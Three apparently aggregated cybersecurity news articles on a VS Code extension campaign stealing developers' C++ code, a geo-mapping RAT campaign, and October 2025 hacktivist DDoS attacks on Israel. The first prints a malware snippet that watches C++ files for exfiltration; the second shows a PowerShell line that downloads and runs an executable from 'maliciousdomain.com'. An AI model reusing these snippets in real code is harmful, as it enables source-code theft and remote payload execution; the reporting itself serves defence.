A sophisticated threat actor known as TigerJack has systematically infiltrated developer marketplaces with at least 11 malicious Visual Studio Code extensions, targeting thousands of unsuspecting developers worldwide.

Operating under multiple publisher identities including ab-498, 498, and 498-00, this cybercriminal has deployed a comprehensive attack arsenal designed to steal source code, mine cryptocurrency, and establish remote backdoors for complete system control.

The scale of this operation is staggering. Two of TigerJack’s most successful extensions, “C++ Playground” and “HTTP Format,” infected over 17,000 developers before Microsoft quietly removed them from their marketplace. However, the threat persists beyond the initial takedown.

TigerJack’s git repository (Source – Koi)

These malicious extensions remain fully operational in the OpenVSX marketplace, which powers popular IDE alternatives like Cursor and Windsurf, continuing their covert operations months after their removal from Microsoft’s platform.

What makes this campaign particularly insidious is the sophisticated deception employed by the threat actor.

The extensions deliver exactly the functionality they promise while simultaneously conducting malicious activities in the background.

Developers installing these tools receive genuine utility – code compilation, error highlighting, and formatting capabilities – creating the perfect cover for the underlying malware operations.

Koi analysts identified the malware’s sophisticated multi-layered approach during their comprehensive investigation.

The threat actor employs a trojan horse strategy, initially publishing benign extensions to build trust and accumulate positive reviews before deploying malicious updates.

This methodical approach allowed TigerJack to establish credibility within the developer community while positioning for large-scale intellectual property theft.

Even as security researchers investigated this operation, TigerJack demonstrated remarkable persistence by launching a coordinated republication campaign.

On September 17, 2025, five new extensions appeared simultaneously under the “498-00” publisher account, including a repackaged version of the original C++ Playground malware.

This systematic approach reveals an operation designed for longevity rather than opportunistic attacks.

Code Theft Mechanism and Technical Implementation

The technical sophistication of TigerJack’s code exfiltration mechanism exemplifies advanced malware engineering.

The “C++ Playground” extension activates automatically through its onStartupFinished trigger and establishes a document change listener that monitors every C++ file within the developer’s workspace.

The malware employs surgical precision, targeting only C++ files to avoid detection from developers working in other programming languages.

Every keystroke triggers the malicious function after a carefully calibrated 500-millisecond delay – optimized to capture code in real-time while avoiding performance degradation that might alert users.

The complete source code gets packaged into JSON payloads and transmitted to multiple exfiltration endpoints, including “ab498.pythonanywhere.com” and “api.codex.jaagrav.in.”

The payload structure reveals the comprehensive scope of data theft, capturing not only the complete C++ source code but also processed versions and simulated input data.

P.workspace.onDidChangeTextDocument((i) => {
    if (i.document &&
        i.document.languageId == "cpp" &&
        i.document?.uri.scheme == "file") {
        (j?.document.uri.toString() != mt.myfile &&
            (mt.myfile != i.document.uri.toString()) &&
            (Bt(i), (mt.myfile = i.document.uri.toString())))
    }
})

The exfiltrated data includes breakthrough algorithms, competitive advantages, thesis projects, and proprietary code – representing months or years of intellectual property theft.

This mechanism operates invisibly alongside the extension’s legitimate functionality, making detection extremely challenging for individual developers who observe only the promised features while their most valuable digital assets are systematically stolen.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post TigerJack Hacks Infiltrated Developer Marketplaces with 11 Malicious VS Code Extensions appeared first on Cyber Security News.

The emergence of a sophisticated malware campaign leveraging geo-mapping technology has put critical infrastructure and enterprise networks on high alert.

First observed targeting sectors across Asia and North America, the malware was traced to a group of Chinese threat actors employing advanced stealth tactics to sustain prolonged network penetration.

Attackers harnessed a unique blend of legitimate mapping utilities and customized remote access Trojans (RATs), allowing them to skirt detection and exploit geographic data for lateral movement within compromised environments.

Initial infection occurred through spear-phishing emails laced with trojanized document attachments. The malicious payload, once activated, executed scripts that covertly downloaded mapping components and command modules from attacker-controlled servers.

The infection chain embedded itself within trusted local services—often using digital certificates mimicking known vendors—thereby thwarting basic endpoint and network defenses.

Breaches documented by Reliaquest researchers revealed an emphasis on blending into existing network traffic, with payloads engineered to appear as legitimate geographic information software updates or add-ons.

Reliaquest analysts noted the malware’s remarkable longevity, with forensic traces showing persistence for over twelve months on several victim networks.

Investigators highlighted the adversaries’ methodical use of geo-mapping metadata, which enabled targeted surveillance and resource mapping, helping attackers evade geofencing-based security controls and remain undetected for extended periods.

Embedded Scripts and Custom RAT Deployment

Central to the malware’s success was its flexible infection routine. The threat actors embedded PowerShell and VBScript code snippets into Microsoft Office documents, ensuring automatic execution upon opening.

For example:-

$payload = Invoke-WebRequest -Uri "http://maliciousdomain.com/geo-component.exe" -OutFile "C:\\temp\\geo.exe"
Start-Process "C:\\temp\\geo.exe"

This script downloads and launches the malicious geo-mapping executable, camouflaged as a software component. Once resident, the malware established persistence via scheduled tasks and registry keys.

The custom RAT modules dynamically referenced local network maps, performing discovery operations and periodic beaconing to C2 infrastructure.

Here the ‘Malware Persistence Workflow,’ illustrates how these scheduled tasks and registry manipulations anchor the threat’s presence over time, ensuring attackers maintain access even after system reboots and basic remediation efforts.

Security teams are urged to monitor for anomalous scheduling routines and network traffic involving mapping utilities, as these behaviors often precede extended compromises.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Chinese Hackers Leverage Geo-Mapping Tool to Maintain Year-Long Persistence appeared first on Cyber Security News.

A sophisticated campaign orchestrated by multiple hacktivist groups has emerged, targeting government portals, financial services, and online commerce platforms across Israel and allied nations.

The coordinated cyber offensive, timed around the October 7 anniversary, demonstrated unprecedented levels of organization and cross-ideological cooperation among geographically dispersed threat actors.

The campaign peaked on October 7, 2025, with over 57 distributed denial-of-service attack claims recorded in a single day, representing a 14-fold increase from the September 2025 daily average.

The multi-pronged assault involved several prominent hacktivist collectives, with Arabian Ghosts leading the charge by claiming responsibility for over 40% of all attack attempts.

Supporting groups included Keymous+, OpIsrael, and notably, NoName057(16), a pro-Russian hacktivist collective that demonstrated the blurring of traditional geopolitical boundaries in cyber warfare.

The participation of Russian-aligned actors in a predominantly pro-Palestinian campaign illustrates how shared adversaries can unite hacktivists from distinct ideological spheres, creating more resilient and far-reaching cyber coalitions.

Radware analysts identified that most attacks remained short-lived but strategically focused on high-visibility targets across critical infrastructure sectors.

The targeting pattern revealed a calculated approach to maximize public impact, with government websites accounting for the largest share of attack claims, followed by financial services institutions and online commerce platforms.

Beyond these primary targets, the campaign extended to education, healthcare, manufacturing and retail sectors, each representing approximately 7% of total attack claims, suggesting opportunistic target selection designed to amplify perceived operational success.

The attackers employed a sophisticated propaganda and coordination infrastructure, utilizing Telegram channels and social media platforms as real-time command centers.

Groups like Sylhet Gang functioned primarily as propaganda orchestrators rather than direct operational actors, leveraging their extensive social media presence to amplify calls for coordinated action and mobilize affiliated networks.

This approach proved highly effective, with the temporal correlation between public mobilization messages and subsequent attack waves demonstrating strong organizational capabilities within the hacktivist ecosystem.

Attack Infrastructure and Persistence Mechanisms

The campaign’s technical architecture revealed advanced coordination capabilities, with threat actors implementing multi-layered verification systems to substantiate their claims.

Participating groups consistently shared check-host verification links as proof of successful disruptions, creating a transparent accountability mechanism that enhanced credibility within hacktivist communities.

This verification approach represented a significant evolution from previous campaigns, where claims often lacked substantive technical evidence.

NoName057(16) extended its operations beyond Israeli targets, conducting simultaneous attacks against German infrastructure while describing Germany as pro-Israeli in its messaging.

The group’s DDOSIA volunteer network facilitated crowdsourced attack capabilities, demonstrating how legitimate volunteering frameworks can be repurposed for coordinated cyber operations.

Historical analysis of NoName057(16) operations shows consistent patterns of leveraging major geopolitical flashpoints to amplify visibility and reinforce ideological messaging, positioning the group as a persistent actor in information warfare campaigns.

The campaign’s persistence mechanisms included server compromises across multiple jurisdictions, with Sylhet Gang claiming to have compromised dozens of Israeli, American and European servers.

According to the group’s statements, they implemented multi-stage infection processes involving system defacement, proof-of-concept file uploads, data exfiltration, and malicious software installation.

However, many of these claims remained unverifiable, highlighting the propaganda-focused nature of some participating groups rather than their technical sophistication.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Pro-Russian Hacktivist Group Attacking Government Portals, Financial Services and Online Commerce appeared first on Cyber Security News.